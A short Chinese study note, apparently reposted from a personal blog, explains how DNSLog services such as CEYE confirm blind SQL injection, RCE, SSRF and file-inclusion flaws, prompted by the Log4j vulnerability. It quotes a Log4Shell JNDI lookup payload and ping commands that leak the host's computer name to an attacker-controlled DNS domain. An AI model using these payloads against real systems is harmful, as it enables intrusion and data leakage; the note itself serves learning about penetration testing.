[NOTE] 关于DNSLog平台的使用
[NOTE] 關于DNSLog平臺的使用
前言
起因是12.09午夜的Log4j核彈級漏洞
大家驗證漏洞的payload:${jndi:idap://XXXX.dnslog.cn/aa}
發現大家用的都是DNSLog,而自己還不太懂這個
于是發現自己還是真的菜
就趕緊補一波
所以說什么時候自己租個服務器
DNSLog Platform
現如今的DNS解析一般是一個遞歸+迭代解析的過程:
粉->藍->黃->綠->紅
其中我們可以自己建立一個紅色的服務器,接收記錄每次的DNS請求
可以在一些在線的DNSLog平臺申請一個域名,作為臨時的DNS服務器
受害者查詢的這個域名解析請求,會被該DNS服務器記錄下
攻擊者就可以結合其他字段形成payload,來進行滲透測試
主要針對無回顯、盲注的情況
-
SQL盲注
-
RCE
-
SSRF
-
RFI (Remote File Inclusion)
相當于是提供一個回顯的地方
實例
以CEYE為例
在CEYE已經申請到了一個子域名:XXXXX.ceye.io
這個就相當于是一個攻擊者的DNS服務器了
然后任何關于*.XXXXX.ceye.io\*的解析請求都會被記錄
于是簡單一下,嘗試:ping whoami.XXXXX.ceye.io
結合其他字段形成payload:ping %computername%.XXXXX.ceye.io
大概就這樣吧
CEYE除了DNS服務器之外,還有HTTP服務器
最后記下Windows和Linux的一些常用系統變量
另起筆記,在這里
總結
以上是生活随笔為你收集整理的[NOTE] 关于DNSLog平台的使用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [NOTE] XPath及其注入
- 下一篇: [NOTE] sqli-labs Bas